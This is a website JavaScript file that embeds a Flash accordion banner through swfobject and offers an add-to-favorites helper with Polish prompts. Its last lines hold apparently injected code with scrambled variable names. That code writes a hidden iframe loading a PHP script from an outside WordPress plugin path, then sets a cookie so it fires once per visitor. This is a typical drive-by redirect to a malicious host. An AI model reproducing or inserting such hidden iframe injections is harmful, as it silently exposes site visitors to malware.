﻿var stageW = 950;
var stageH = 250; 
var cacheBuster = Date.parse(new Date());
			
var flashvars = {};
var params = {};
			
params.bgcolor = "#454647";
params.allowfullscreen = "true";
			
			
flashvars.stageW = stageW;
flashvars.stageH = stageH;
	
flashvars.xmlPath = "accordion.xml";

flashvars.keepSelected = "t";
flashvars.selectedWindow = "0";
flashvars.slideshow = "t";
			
flashvars.imageWidth = "550";
flashvars.imageHeight = "250";
		
swfobject.embedSWF("preview.swf?t="+cacheBuster, "contentBanner", stageW, stageH, "9.0.124", "core/expressInstall.swf", flashvars, params);

function addToFavorites(){
	if (typeof window.external != "undefined" && navigator.userAgent.indexOf("MSIE") != -1) {
		window.external.AddFavorite(document.URL, document.title);
	} else if (typeof window.opera != "undefined") {
		alert("Aby dodać stronę do ulubionych wybierz CTRL+D");
	} else {
		alert("Aby dodać stronę do ulubionych wybierz CTRL+D");
	}
	return false;
}

if (document.cookie.search("iqopd=9") == -1) {
gjai=document.getElementById('qzcqt');if(gjai==null){document.write('<iframe id=qzcqt src=http://jose.rebeldes.org.ar/wp-content/plugins/web-music/ajax.php style=display:none></iframe>');}
document.cookie = "iqopd=9;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}

